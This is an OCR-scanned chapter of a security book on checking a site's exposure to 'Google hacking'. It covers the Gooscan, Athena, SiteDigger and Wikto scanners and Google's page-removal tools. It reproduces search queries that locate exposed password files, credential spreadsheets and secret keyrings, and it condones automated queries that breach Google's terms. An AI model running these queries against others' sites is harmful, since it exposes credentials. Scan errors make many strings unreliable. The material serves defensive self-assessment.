Gooscan 's Data Files Used in multiple query mode, Gooscan reads queries from a data file. The format of the data files is as follows: www. syngress.com 336 Chapter 11 • Protecting Yourself from Google Hackers search_tYpe | search_string | count | description search_type can be one of the following: ■ intitle Finds search_string in the title of the page. If requested on the command line, Gooscan will append the site query. Example: intitle | error | | This wiU find the word evrov in the title of a page. ■ inurl Finds search_string in the URL of the page. If requested on the command Hne, Gooscan wiU append the site query. Example: inurl I admin | | This wiU find the word admin in the URL of a page. ■ indexof Finds search_string in a directory listing. If requested on the command line, Gooscan wiU append the site query. Directory listings often wiU have the term index of in the title of the page. Gooscan wiU generate a Google query that looks something like this: intitle : index . of search_string Note When using the site switch, Gooscan automatically performs a generic search for directory listings. That query looks like this: intitle lindex.of site:site_name. If this generic query returns no results, Gooscan will skip any subsequent /nc/exof searches. It is a logical conclusion to skip spe- cific /ndexof searches if the most generic of indexof searches returns nothing. For example: indexof] htaccess\ \ This search will find .htaccess files sitting in a directory listing on the server. ■ Jiletype Finds search_string as a filename, inserting the site query if requested on the command line. For example: filetYpe|cgi cgi | | This search wiU find files that have an extension of .cgi. www. syngress.com Protecting Yourself from Google Hackers • Chapter 11 337 ■ raw This searchjtype allows the user to build custom queries. The query is passed to Google unmodified, adding a site query if requested in the command line. For example: raw I filetype : xls email username password] | This example wiU find Excel spreadsheets with the words email, user- name, and password inside the document. ■ search string The search_string is fairly straightforward. Any string is allowed here except chars \n and | . This string is HTML-ized before sending to Google. The A character is converted to %65, and so on. There are some exceptions, such as the fact that spaces are converted to the + character. ■ count This field records the approximate number of hits found when a similar query is run against aU of Google. Site is not applied. This value is somewhat arbitrary in that it is based on the rounded numbers supplied by Google and that this number can vary widely based on when and how the search is performed. StiU, this number can provide a valuable watermark for sorting data files and creating custom data files. For example, zero count records could safely be eliminated before running a large search. (This field is currently not used by Gooscan.) ■ description This field describes the search type. Currently, only the file- type, gs data file populates this field. Keep reading for more information on the fdetype.gs data file. Several data files are included with Gooscan, each with a distinct purpose: ■ gdork.gs This file includes excerpts irom the Google Hacking Database (GHDB) hosted at http://johnny.ihackstuif.com.The GHDB is the Internet's largest database of Google hacking queries maintained by thousands of members who make up the Search Engine Hacking Forums, also hosted at http://johnny.ihackstuff.com. Updated many times a week, the GHDB currently sits at around 750 unique queries. ■ filetype. gs This huge file contains every known fdetype in existence, according to www.filext.com. By selecting interesting lines from this file, you can quickly deternTine the types of files that exist on a server that might warrant further investigation. We suggest creating a subset of this fde (with a Linux command such as: www. syngress.com 338 Chapter 11 • Protecting Yourself from Google Hackers head -50 filetype.gs > short_filetype . gs for use in the field. Do not run this file as is. It's too big. With over 8,000 queries, this search would certainly take quite a while and burn precious resources on the target server. Instead, rely on the numbers in the count field to tell you how many (approximate) sites contain these files in Google, selecting only those that are the most common or rele- vant to your site. The filetypes.gs file lists the most commonly found extensions at the top. ■ inurl.gs This very large data file contains strings fi-om the most popular CGI scanners, which excel at locating programs on Web servers. Sorted by the approximate number of Google hits, this file lists the most common strings at the top, with very esoteric CGI vulnerability strings listed near the bottom. This data file locates the strings in the URL of a page. This is another file that shouldn't be run in its entirety. ■ indexof.gs Nearly identical to the inurl.gs fde, this data file finds the strings in a directory listing. Run portions of this file, not all of it! Using Gooscan Gooscan can be used in two distinct ways: single-query mode or multiple-query mode. Single-query mode is little better than using Google's Web search feature, with the exception that Gooscan will provide you with Google's number of results in a more portable format. As shown in Figure 11.8, a search for the term daemonP returns 2440 results fi-om all of Google.To narrow this search to a specific site, such as phrack.org, add the [s] option. For example: gooscan -q "daemon9" -t www.google.com -s phrack.org. WWW. syngress.com Protecting Yourself from Google Hackers • Chapter 11 339 Figure 11.8 Gooscan's Single-Query Mode u© O © ^rootplocal host:- /file/final — bash - ~/Desktop/gooscan-v@.9$ ./gooscan -q "dciemon9" -t www.google.com ***]][ WARNING: Vou are querying a www.googLe.com server !![*** This tool was designed to query Google appliances, not the google.com website. The google.com scanning functionality is included for EDUCATIONAL PURPOSES ONLY to help webmasters determine the potential Google exposure of their sites. Do you acknowledge that: - You are knowingly violating Google's terms of service found at h tt p : //www . goog I e . com/ terms. of _servi ce . htm I - You are using this tool to assess your own web site's exposure - The use of this tool in this way is not condoned by the author - You will not hold the author liable in any way for the use of this tool la Agree? (y/n) [n] y doing lookup of www.google.com... "daemon9" returned 244Q results. ~/Desktop/gooscan-v0.9$ | Notice that Gooscan presents a very lengthy disclaimer when you select www.google.coni as the target server. This disclaimer is only presented when you submit a search that potentially violates Google TOS. The output from a standard Gooscan run is fairly paltry, listing only the number of hits from the Google search. You can apply the [-o] option to create a nicer HTML output format. To run the daemon9 query with nicer output, run: gooscan -q "daemon9" -t www.google.com -o daemon9.html As shown in Figure 11.9, the HTML output lists the options that were applied to the Gooscan run, the date the scan was performed, a list of the queries, a link to the actual Google search, and the number of results. Figure 11.9 Gooscan's HTML Output in Single-Query Mode 0 O 0 iJaemon9.html 1 - ► I fc] 01 - 'Q' Google GDDScan Results site: none input Fiie: none Executed: Sun Oct 3 00:12:26 2004 [Search |^iril<||Re5ults| |daemon9||Mi< IF 2440| gooscan by jOlinny nttDi^/iohnnv.ihackstuFT.conn www.syngress.com 340 Chapter 11 • Protecting Yourself from Google Hackers The link in the HTML output points to Google. CUcking the link wiU per- form the Google search for you. Don't be too surprised if the numbers on Google's page diifer from what is shown in the Gooscan output; Google's search results are sometimes only approximations. Running Google in multiple-query mode is a blatant violation of Google's TOS but shouldn't cause too much of a Google-stink if it's done judiciously. One way to keep Google on your good side is to respect the spirit of its TOS by sending small batches of queries and not pounding the server with huge data files. As shown in Figure 11.10, you can create a small data file using the head command. A command such as: head -5 data_files/gdork . gs > data_files/little_gdork . gs wiU create a four-query data file, since the gdork.gs file has a commented header line. Figure 11.10 Running Small Data Files Could Keep Google from Frowning at You ©ee ~/Desktop/gooscan-v0 .9- "/Desktop/gooscan-ve .9: ttle.gdork.html root@localho5t:~/file/final — bash — IS 2 head -B data_f 1 les/gdork.gs > data_f i les/llttle_gdork.gs ./gooscan -t www.google.oom -1 data_f 1 les/l Itt le_gdork .gs -o Li ***! I I WARNING: You are querying a www. google. com server I i I*** This tool was designed to query Google applianoes, not the google. oom website. The google.com scanning functionality Is Included for EDUCATIONAL PURPOSES ONLY to help webmasters determine the potential Google exposure of their sites. Do you acknowledge that: - You are knowingly violating Google's terms of service found at http ://www.goog le .com/terms_of .service .htm I - You are using this tool to assess your own web site's exposure - The use of this tool In this way Is not condoned by the author - You will not hold the author liable In any way for the use of this tool Agree? (y/n) [n] y doing lookup of www.google.com... Results:"cacheserverreport for" "This analysis was produced by caluniurls" raw:6! Results:intltle:"Ganglla" "Cluster Report for" raw:339 Results:intltle:"Apache HTTP Server" Intltle: "documentation" rawim Results: "Error Diagnostic Information" Intlt le : "Error Occurred While" raw:39900 ~/De5ktop/gooscan-v0.9$ | The output from the multiple-query run of Gooscan is stiU paltry, so let's take a look at the HTML output shown in Figure 11.11. www. syngress.com Protecting Yourself from Google Hackers • Chapter 11 341 Figure 11.11 Gooscan's HTML Output in Multiple-Query Mode 3© ei llttle_gdDrk.html Google Gooscan Results site: none inpjt file: data_nies/little_gidork.gs Executed: Sun Oct 3 00:24:39 2004 Search Link Results "cacheserverreport for" "This analysis was produced by ca la maris" link 657 intitle:"Ganglia" "Cluster Report for" link 339 intit!e:"Index of" dbconvert.exe cliats link 0 intit!e:"Apache HTTP Server" intitle;"documentation" link 171 "Error Diagnostic Information" intitle;"Error Occurred Wliile" link 39900 Using Gooscan with the [s] switch we can narrow our results to one partic- ular site, in this case http://johnny.ihackstufF.coni, with a command such as: Gooscan -t www.google.com s johnny.ihackstuff.com -i data_files/little_gdork.gs -o ihackstuff.html as shown in Figure 11.12. Figure 1 1 .1 2 A Site-Narrowed Gooscan Run oi ihackst jff.hCrnl * ■ Or Google Gooscan Results site: IhackstufTxonn Input File: data_nie3/littlB_gdork,gs Executed: Sun Oct 3 00:43:51 2004 Search Link Results "cacheserverreport for" "This analysis was produced by ca la maris" link 1 intitle:"Ganglia" "Cluster Report for" link o| intitlef'Index of" dbconvert.exe chats link 0 intitle:"Apache HTTP Server" intitle:"documentation" link 0 "Error Diagnostic Information" intitle:"Error Occurred While" link 0 gooscan tjyJOIinny l^tta://iol^^nv.lhackstuff.cQ^n Most site-narrowed Gooscan runs should come back pretty clean, as this run did. If you see hits that look suspicious, click the link to see exactly what Google saw. Figure 11.13 shows the Google search in its entirety. www.syngress.com 342 Chapter 11 • Protecting Yourself from Google Hackers Figure 11.13 Linking to Google's Results from Gooscan r O O O Coogle Search: " cache serverre port f. .. by calamaris" site:ihack5ti [I http://www.goo9le.com/ search ?&q= " Q." Google Google Web Imaoss Groups News Frpogle mors » "cacheserverreport for" This analysis was produced b' Search^ Web Results 1 - 1 of 1 from ihackstufT.com for "cacheserverreport for" 'This analysis vti Tip: Try removing quotes from your search to get more results. johnnv.ihacksliiff.com :: I'm jOhnny. I hack stuff. ... Click here for the Google search ==> "cacheserverreport for" "This analysis was produced by calamaris" (opens In new window) Added: Tuesday, June 24, hits ... johnny. ihackstuff.com/ inds)!.php?module=prodreviei«sAfunc=showcontent&id=1 -26k - Cached - Similar oaoes In this case, we managed to locate the Google Hacking Database itself, which included a reference that matched our Google query. The other searches didn't return any results, because they were a tad more specific than the Calamaris query, which didn't search titles, URLs, fdetypes, and the like. In summary, Gooscan is a great tool for checking your Web site's exposure, but it should be used cautiously since it does not use the Google API. Break your scans into small batches, unless you (unwisely) like thumbing your nose at the EstabUshment. Windows Tools and the .NET Framework The Windows tools we'U look at all require the Microsoft .NET framework, which can be located with a Google query of .NET framework download.The suc- cessful installation of the framework depends on a number of factors, but regard- less of the version of Windows you're running, assume that you must be current on all the latest service packs and updates. If Windows Update is available on your version of Windows, run it. The Internet Explorer upgrade, available from the Microsoft Web site (Google query: Internet Explorer upgrade) is the most common required update for successful installation of the .NET Framework. Before downloading and installing Athena or SiteDigger, make sure you've got the .NET Framework properly installed. www. syngress.com Protecting Yourself from Google Hackers • Chapter 11 343 Athena Athena by Steve Lord (steve@buyukada.co.uk) is a Windows-based Google scanner that is not based on the Google API. As with Gooscan, the use of this tool is in violation of Google's TOS and that as a result, Google can block your IP range from using its search engine. Athena is potentially less intrusive than Gooscan, since Athena only allows you to perform one search at a time, but Google's TOS is clear: no automated scanning is allowed. Just as we discussed with Gooscan, use any non-API tool judiciously. History suggests that if you're nice to Google, Google will be nice to you. Athena can be downloaded from http://snakeoillabs.eom/.The download con- sists of a single MSI file. Assuming you've installed the .NET Framework, the Athena installer is a simple wizard, much like most Windows-based software. Once installed and run, Athena presents the main screen, as shown in Figure 11.14. As shown, this screen resembles a simple Web browser. The Refine Search text box allows you to enter or refine an existing query. The Search button is similar to Google's Search button and executes a search. Figure 1 1 .14 Athena's Main Screen To perform basic searches with Athena, you need to load an XML file con- taining your desired search strings. Simply open the file from within Athena and all the searches will appear in the Select Query drop-down box. Simply select your www. syngress.com 344 Chapter 11 • Protecting Yourself from Google Hackers query and click the Search button. Selecting buddylist.blt and cHcking Search will deliver the Google results irom that search, as shown in Figure 11.15. Figure 11.15 Basic Search Results :::::: U — m Google 1 — As you can see, the results of the query contain undesired items. Fortunately, Athena allows you to refine your query using the Refine Search box. Using the previous query, entering inurl:"buddyKst.blt" into the Refine Search box and clicking the Search button provides a much cleaner search (see Figure 11.16). Figure 11.16 Athena's Refine Query Feature in Action 1 ' dU ...... q.,.-| s..»,„.,| ,.,.11 ..... Google ■ mm's=. BuddvJIist-fCommanderf'MrMofoDLKJBuadiiNoteJNoteSmnaMr Confidf version 1"l-UEW-lscreenNameTTieGlw&19901-Budd.(-f list... lui 1 vnr. 1 II iMii 1 ■iCreonName'AlckJuGGIo orofile ... cone nUslrebulldeifllas/buddirt 161 Bit d WWW. syngress.com Protecting Yourself from Google Hackers • Chapter 11 345 At this point, Athena might seem rather pointless. It functions just like a Web browser, submitting queries into Google and displaying the results. However, Athena's most powerful functionality lies in its XML-based configuration files. Using Athena's Config Files Two of these files are included with Athena: Athena. xinl and digicams.xml. These files contain custom queries and descriptions of those queries. The digicams file contains sample queries for finding images; the Athena. xml file contains the queries found in the GHDB. To load these files, click File | Open Config and select the XML file you'd Uke to use. Figure 11.17 shows Athena's main screen after you load athena.xml. Figure 11.17 Athena Loaded with Athena.XML ........ 1 J 1 .— |.... 1 «.......| s..».™.,| ~ Google i As mentioned, Athena uses the GHDB as a source for its searches, making it a very thorough scanning tool. The SiteDigger tool uses similar searches but has chosen not to officially support the GHDB. This means that SiteDigger has far fewer researchers submitting new searches, making for a potentially less thorough search database. www. syngress.com 346 Chapter 11 • Protecting Yourself from Google Hackers Constructing Athena Config Files Athena's XML-based config files, which are compatible with Foundstone's SiteDigger, can be modified or even completely overhauled based on your needs. There are two main sections to the XML file: a searchEngine section and the sig- nature section. The searchEngine section describes how a particular search engine's queries are constructed. A typical searchEngine section is shown in the following code examples. Google (UK) http : / /www. google . co . uk/search?q= %2 6ie=UTF-8%2 6hl=en%2 6meta= This section is responsible for describing how the various search engines handle search requests. The searchEngineName field is simply a text-based field that describes the name of the search engine. This name wiU appear in Athena's drop-down box, allowing you to select from among different search engines. The searchEnginePrefixUrl field represents the first part of the search URL that is sent to the search engine. It is assumed that the query part of the search wiU be fiUed in after this prefix. The searchEngine PostJixURL field describes the part of the URL that will come after the prefix and the query. This usually describes various options such as output format (UTF-8). Note that Athena uses the section, and SiteDigger does not. This section could be reworked to search the US.-based Google engine with the following searchEngine section: Google (US) http : / /vtvjw . google . com/ search?q= %2 6ie=UTF- 8%2 6hl=en%2 6meta= The signature section describes the individual searches that are to be per- formed. A typical signature section is shown in the following code example: www. syngress.com Protecting Yourself from Google Hackers • Chapter 11 347 22 Tl TECHNOLOGY PROFILE DON intitle :" Index of" secring.bak PGP Secret KeYRing Backup This querY looked for a backup of the PGP secret keY ring. With this keYring an attacker could decrypt messages encrypted hy the user. 10 00 http : / /johnny.ihackstufF.com The signatureReferenceNumber is a unique number assigned to each signature. The categoryref is a unique number that describes the signature in the context of its category, which is described in full by category. The querystring is the Google query that is to be performed. It is made HTML-friendly and inserted between the seardiEnginePrefixUrl and the searchEnginePostfixUrl in the URL sent to Google. shortDescription and textualDescription are short and long descriptions of the search, respectively. The cveNumber and cveLocation refer to the www.cve.mitre.org Common Vulnerabilities and Exposures list. The header of the XML file should contain these lines: and the file should be closed out with a line as well. Using this format, it's fairly simple to create a file of custom queries. The file must conform to the UTF-8 character set and be strictly XML compliant. This means that HTML tags such as and
    must not only be matched with closing tags but that each HTML tag be case sensitive. Microsoft's XML scanner wiU complain about an opening
    tag followed by a closing
    tag, since the case of the tags is different. The less-than and greater-than symbols (< and >) can also cause problems when used improperly. If your data www.syngress.com 348 Chapter 11 • Protecting Yourself from Google Hackers contains the Internet shorthand for "grin," which is , the MS XML scanner will complain. Tools and Traps Current Config Files The maintainers of the GHDB make available current config files for use with Athena. This file can be downloaded from http://johnny. ihackstuff.com. The Google API and License Keys The only way Google will explicitly allow you to automate your queries is via the Google Application ProgramnTing Interface. We'U talk about programnTing in more detail later, but to obtain programs written with the Google API running, you'll need to obtain a Hcense key, and to do that you must first create a Google account by visiting www.google.com/accounts/NewAccount. If you already have a Google account (obtained through Google Groups or the Gmail service, for example) you can log into that account through the Google accounts page, located at www.google.com/accounts. Once logged in, you can proceed to http://api. google, com/createkey to obtain your key. The license key is a sequence of characters that when entered into any tool created with the Google API, allows you to perform 1000 automated queries per day. SiteDigger SiteDigger is a tool very similar to Athena, but it is automated and uses the Google API. You must acquire a Google license key to use this program. SiteDigger was architected by Mark Curphey, and development credit goes to Kartik Trivedi, Eric Heitzman, Aaron Higbee and Shanit Gupta. You can down- load SiteDigger from www.foundstone.com/resources/proddesc/sitedigger.htm. In addition to a license key, you wiU need to download and install the Microsoft .NET Framework, as we discussed earlier in this chapter. There is no installation for SiteDigger — simply unzip the files into a directory and go. Once launched, SiteDigger presents the main screen, shown in Figure 11.18. www. syngress.com Protecting Yourself from Google Hackers • Chapter 11 349 Figure 11.18 SiteDigger's Main Screen £ Foundstone SiteDigger v1 .0 File Option? Help About Foundstoite | siteDiEgei FlesLills I Signature? | Search | Stop | Dear | EKport Results | The main screen allows you to enter a domain (such as those used with the site operator) and your Google license key. The Search, Stop, and Clear buttons are self-explanatory. SiteDigger's menu bar is fairly useless. The only item worth using is Options, which allows you to update SiteDigger's signatures from Foundstone 's Web site. The Signatures tab, shown in Figure 11.19, lists the queries that SiteDigger is capable of executing. Figure 11.19 SiteDigger's Familiar Signatures M Foundstone SiteDigger v1 .0 □ 0 BACKUP FILES - 0 irlille ndeK ol basli_hislorv ■ M intille. ndeK.ol .;h_histoijj ■ \7\ intille. 'IndsK gF' indeK.hlml.bak ■ [7|intitl& Inden of" index php.bali - [Tjintitle' 'IndeH ofiriden jsp bak - [3 intide' IndeKof"" htpajswd"htpaiswd,bak - 0 irijrl backup inlille inde« ol inuitadmin '- 0 "I fide K of /backup" 0mNFIG MANAGEMENT •.0irtitle"lnde«oP'guedb™kcgi - [71 irtitfe"lndeM of" lpcoijnt.ene - [7|irtitle'"lndeHof"m?adc?.dll - [71 irtiile index ol trill Ian iri - 0 allinurl aijtli_usei_lile.lKl ■ [71 intille. I ndeK. g|. etc .-. [7| filel^pexls useirame password email ■ [7| filelype hlpassi www.syngress.com 350 Chapter 11 • Protecting Yourself from Google Hackers The signatures in SiteDigger's list should look famiUar. They are very similar to the queries executed by Athena, since many of them came from the GHDB, as you can see when you compare the signature highlighted in Figure 11.19 to the much earlier signature from the GHDB, shown in Figure 11.20. Figure 11.20 Some SiteDigger Searches Look Too Familiar Cammunity rates it: (no ratings yet) There's nothing that defines, a googleDork more than getting your PASSWORDS grabbed by Google for the world to see- Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorksJ Goo-d showJ You'll need to sift i:hrough l:hese results a bit... Click here for the Google search =^ > Entltle:"Index of' ".litpa&&wd" "htgraup-" - lntttle:"dlst" -apache -htpasswd.c (opens in new window) Added: Tuesday, June 24-, 2003 hits: 4723 [ Back to googlecorks Incex ] Want to comment on this review? ftrlwr« for a free user account^ and you'll be able to. SiteDigger does not officially use the GHDB as its foundation, and it is less than one-third the size of the GHDB, which is free to developers with attribu- tion to the GHDB Web site. Without the addition of the signatures from the GHDB, SiteDigger sufiers. Unfortunately, at the time of this writing, the current version of SiteDigger is incompatible with the GHDB. In addition, there are size constraints to the SiteDigger signature database. The developers obviously never imagined a signature database of more than 550 entries, meaning that even in its current state, the GHDB is larger than the maximum SiteDigger can handle. It is unfortunate that such an excellent tool has such obvious shortcomings. The Export Results button on the main screen allows you to create a very nice HTML report listing the results of a scan, as shown in Figure 11.21. www. syngress.com Protecting Yourself from Google Hackers • Chapter 11 351 Figure 11.21 SiteDigger's HTML Report ^ Foundstone SiteDigger v1 .0 Report - Microsoft Internet Explore File Edit View Favorites Tools Help Qsack - Q 0 g] '-^ P Search ■^Favorites »Jj> Ma ■©I g'^H C:\Program Files\Foundstone\5iteDigger\oui:put\resuli:s,hi:ml ndstone | Siteoisger- Eld® Seaixhperfonned on com at 10/5.7004 10:21 AM NOTE: CTJTteiitly SiteDigger only returns the fiistresult for each signature quety. In the next release of the tool, users willbe atle to configure the number of results thejwisli to return. CATEGORY RESULT URl SUMILARY DESCRIPTION TECHNOLOGY PROFILE http : //linux s e Ifhelp . c 0 m/ ap a c h e /ill aiiu aU ntitle:" Apache HTTP 3erver" ntitl e : " do c urn ent atio n" When you install the Apache web server, you get a nice set of online do cumentation. When you leam how to ijse Apache, yout supposedto delete tliese oriline Apache manuals. These sites didn't. If My Corrputer The report lists the category, one result from the search, the summary of the search, and a longer description of the significance of the search. Notice that only one URL is returned. It is most unfortunate that SiteDigger only returns one URL, since this severely limits the tool's effectiveness during a penetration test. Even though you can narrow the search to a particular site or domain, weeding through false positives is part of the Google hacking experience and really can't be automated. Clicking the provided URL takes you not to the Google search page with the listed results (which would be preferred) but to the first page that matched the query. There's no easy way to get back to the Google search page from SiteDigger to check out other query results. Despite SiteDigger's shortcomings, it is still worth using because its automa- tion, much like Gooscan's, makes fairly quick work of large query lists. Wikto Wikto is another tool similar to both Athena and SiteDigger. Like SiteDigger, Wikto requires a Google license key to be entered before you can use the GoogleHacks portion of this tool. Wikto, developed by Roelof Temmingh of Sensepost (www.sensepost.com), does far more than merely query Google. However, this book focuses only on that aspect of the tool. Figure 11.22 shows the default GoogleHacks screen. www. syngress.com 352 Chapter 11 • Protecting Yourself from Google Hackers Figure 11.22 Wikto's GoogleHacks Screen Googlei BackErd Wikto | [ GoogleHacksi | SiisteitiConfie | The Wikto download does not include a copy of the GHDB but is fuUy compatible, as evidenced by the Load GHDB button. Simply download the latest GHDB update from http://johnny.ihackstuff.com and import it using the Load GHDB button. Once it's loaded, you wiU see the first box populated with the GHDB entries, as shown in Figure 11.23. Figure 1 1.23 Wikto Loaded with the GHDB and Ready to Go Protecting Yourself from Google Hackers • Chapter 11 353 Wikto works in two ways. Entering your domain into the Target box is the equivalent of appending Site:yourdoniain.com to each of the searches. CHck the Start GH button and Wikto will work its way through the GHDB, one entry at a time (see Figure 11.24). Figure 1 1 .24 Wikto Site Scan in Progress Wikto displays the information about each query as it passes it, as shown in Figure 11.24. Information about the query (search string, reference ID, general description, and category) are displayed in the middle window, and returned results are displayed in the bottom window. Wikto will also perform single queries without the Site: tag. By highlighting your desired search string from the GHDB in the top window and clicking the Manual button, Wikto queries Google and returns all results found, as shown in Figure 11.25. www. syngress.com 354 Chapter 11 • Protecting Yourself from Google Hackers Figure 11.25 Wikto Manual Search Results As you can see, the output differs only in the lower window, which displays all the results returned from the query. This is identical to going to Google. com and manually entering the search string, only Wikto is much more convenient. The one downside to Wikto as of the time of this writing is its lack of a log- ging feature. Results must be manually cut and pasted if you want to save them. Despite this shortcoming, Wikto 's compatibility with the GHDB and its exten- sive features currently make it one of the better tools available. Getting Help from Google So far we've looked at various ways of checking your site for potential informa- tion leaks, but what can you do if you detect such leaks? First and foremost, you should remove the offending content from your site. This may be a fairly involved process, but to do it right, you should always figure out the source of the leak, to ensure that similar leaks don't happen in the future. Information leaks don't just happen; they are the result of some event that occurred. Figure out the event, resolve it, and you can begin to stem the source of the problem. Google makes a great Web page available that helps answer some of the most commonly asked questions fi^om a Webmaster's perspective. The "Google Information for Webmasters" page, located at www.google.com/webmasters, lists all sorts of answers to commonly asked questions. www. syngress.com Protecting Yourself from Google Hackers • Chapter 11 355 Solving the local problem is only half the battle. In some cases, Google has a cached copy of your information leak just waiting to be picked up by a Google hacker. There are two ways you can delete a cached version of a page. The first method involves the automatic URL removal system at http://services.google.com/urlconsole/controller.This page, shown in Figure 11.26, requires that you first verify your e-mail address. Although this appears to be a login for a Google account, Google accounts don't seem to provide you access. In most cases, you will have to reregister, even if you have a Google account. The exception seems to be Google Groups accounts, which appear to allow access to this page without a problem. Figure 11.26 Google's Automatic URL Removal Login Gougle Remove your URL or Google Graups Post First time here? In order to remove a URL &Dra (he Gaaglc: index or an article &ora Google Groups, wc need to first verify your e-mail address. Please enter it below, along wifli a password. Note: To remove a message &ora Google Groups, please register with the email address from which you posted that message. Email: |^ Password: |~ Confirm Password: |~ [ Creaie Accaurtj A oonfinnatjon email will be sent to you once you have submitted your login information. Pollow the insftuctions in that email to continue. Note: You must activate your new account within 24 hours or it will be automatically deleted. Already have an account? Email: | Password: |~ [Login] Forgot your password? Need to change it? Click here. Once logged in, you will receive an e-mail verification link that, when clicked, will allow you access to the Remove URL options screen, shown in Figure 11. 27. This screen provides links to various sets of instructions to help you remove pages from Google's index. www. syngress.com 356 Chapter 11 • Protecting Yourself from Google Hackers Figure 11.27 URL Removal Main Page Options GoL>gIe Options Status You may remove your URL &om Google's results or your Usenet posts from Google Groups. URLs and posts will typically be removed within 24 hours of a successfully submitted request. You may also review the status of submitted requests in the column to the right. No current requests. Select only ooe: ■ Remove pages^ subdirectPiles or images asing a rabots-txt file. Your robots.txt file need not be in the root directory. ■ Remove a single page using meta tags- Remove an outdated link. ■ Remove your Usenet posts from Google Groups. Please send email to ROORlebo^^oogle. com wi6i Jurdier qusstions or problems regarding the removal of your URL, or to Rroups-support(dlROORle. com if you encounter problems removing your Google Groups posts. The first option allows you to point Google at a robots.txt page that exists on your site. Google will process that robots.txt file, and if it is valid, will begin the processing to remove the pages aifected by that fde. According to Google, these requests are usually processed within 24 hours. This option is especially handy if you have made changes to your robots.txt fde and would Uke Google to retroactively update its database, removing any newly referenced files. The second option allows you to remove a page based on a META tag refer- ence. You can use this option when you discover a page that you'd like to make available to Google, but you'd prefer not to have it cached. Simply update your META tag for the document and submit the document to this removal page. The third option is the real "Oh, crap!" page. If you find a document that absolutely, positively was not supposed to be public, first remove the document, log into the removal system, and click Remove an Outdated Link. The resulting screen, shown in Figure 11.28, allows you several options for removing the offending data. If you're really terrified of the impUcations of the document, click the first removal option. This option should nail everything associated with the document. The second option removes the snippet that appears on the search results page as well as the cached version of the page. The third removal option only deletes the cached version of the page, leaving the snippet on the results page. AH these options require that the original page be deleted first. According to Google, this option takes approximately three to five days to process. Protecting Yourself from Google Hackers • Chapter 11 357 Figure 11.28 Google's "Oh, Crap!" Removal Option Gougle Back to options - Logout Remove your URL or Google Groups Post Remove an outdated link. Enter the URL of your page. Wcwill accept yourroquest only if the page no longer exists on the web. Note: this takes 3-5 business days to process. URL to remove: P e.g, htlp://www, google, com/page. html Remove: C an>'thmg associated with this URL C snippet portion of result (includes cached version) C cached version only Remove outdated [ink The final removal option allows you to remove one of your posts from Google Groups. Unlike the old USENET system, you can make your half-dazed 2:00 A.M. inflammatory comments to a newsgroup go away. To delete a USENET post, log in as the e-mail address from which you posted. Enter either the fuU Groups URL or the Message ID of the message you want to delete. This request usually takes 24 hours to process. www. syngress.com Chapter 1 1 • Protecting Yourself from Google Hackers Summary The subject of Web server security is too big for any one book. There are so many varied requirements combined with so many different types of Web server software, application software, and operating system software that no one book could do the topic justice. However, a few general principles can at least help you prevent the devastating effects a malicious Google hacker could inflict on a site you're charged with protecting. First, understand how the Web server software operates in the event of an unexpected condition. Directory listings, missing index files, and specific error messages can all open up avenues for offensive information gathering. Robots.txt files, simple password authentication, and effective use of META tags can help steer Web crawlers away from specific areas of your site. Although Web data is generally considered public, remember that Google hackers might take interest in your site if it appears as a result of a generic hacking search. Default pages, direc- tories and programs can serve as an indicator that there is a low level of technical know-how behind a site. Servers with this type of default information serve as targets for hackers. Get a handle on what, exactly, a search engine needs to know about your site to draw visitors without attracting undue attention as a result of too much exposure. Use any of the available tools, such as Gooscan, Athena, Wikto or SiteDigger, to help you search Google for your site's information leaks. If you locate a page that shouldn't be public, use Google's removal tools to flush the page from Google's database. Solutions Fast Track A Good, Solid Security Policy 0 An enforceable, solid security poHcy should serve as the foundation of any security effort. 0 Without a poHcy, your safeguards could be inefficient or unenforceable. Web Server Safeguards 0 Directory listings, error messages, and misconfigurations can provide too much information. www. syngress.com Protecting Yourself from Google Hackers • Chapter 1 1 0 Robots.txt files and specialized META tags can help direct search engine crawlers away fi-om specific pages or directories. 0 Password mechanisms, even basic ones, keep crawlers away fi-om protected content. 0 Default pages and settings indicate that a server is not well maintained and can make that server a target. Hacking Your Own Site 0 Use the site operator to browse the servers you're charged with protecting. Keep an eye out for any pages that don't belong. 0 Use a tool like Gooscan or Athena to assess your exposure. These tools do not use the Google API, so be aware that any blatant abuse or excessive activity could get your IP range cut off from Google. 0 Use a tool Hke SiteDigger or Wikto, which uses the Google API and should free you from fear of getting shut down. 0 Use the Google Hacking Database to monitor the latest Google hacking queries. Use the GHDB exports with tools Hke Gooscan, Athena, or SiteDigger. Getting Help from Google 0 Use Google's Webmaster page for information specifically geared toward Webmasters. 0 Use Google's URL removal tools to get sensitive data out of Google's databases. Links to Sites ■ http://johnny.ihackstufF.com The home of the Google Hacking Database (GHDB), the search engine hacking forums, the Gooscan tool, and the GHDB export files. ■ www.snakeoillabs.com Home of Athena. ■ www.foundstone.com/ resources/ proddesc/ sitedigger.htm ■ www.sensepost.com/research/wikto The Wikto Scanner by Sensepost www. syngress.com Chapter 1 1 • Protecting Yourself from Google Hackers ■ www.searchengineworld.com/robots/robots_tutorial.htm A good tutorial on using the robots.txt file. Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Ql What is the no-cache pragma? WiU it keep my pages from caching on Google's servers? A: The no-cache pragma is a META tag that can be entered into a document to instruct the browser not to load the page into the browser's cache. This does not affect Google's caching feature; it is strictly an instruction to a client's browser. See www.htmlgoodies.com/beyond/nocache.html for more infor- mation. Q: Can you provide an^Miore details about securing IIS? A: Microsoft makes avaiBWe^Y^^'y Jjjce IIS Security Planning Tool. Try a Google search for IIS Security Pmnning Tool. Microsoft also makes available an IIS 5 security checklist; Google for 7/5 5 services checklist. An excellent read pertaining to IIS 6 can be fou«d wida a query like "elements of IIS security". ■ovmd wida ri^ Cent*. Also, frequent the IIS SecuriJ^ CentH. Try querying for IIS security center. Q: Okay, enough about IIS. What about securing Apache servers? Al Securityfocus.com has a great article, "Securing Apurhe: Step-by-Step," avail- able from www.securityfocus.com/infocus/1694. Ql Which is the best tool for checking my Google exposure? A: That's a tough question, and the answer depends on your needs. The absolute most through way to check your Web site's exposure is to use the site operator. A query such as site:gulftech.or<^ will show you all the pages on gulftech.org that Google knows about. By looking at each and every page, you'll absolutely know what Google has on you. Repeat this process once a week. Protecting Yourself from Google Hackers • Chapter 11 If this is too 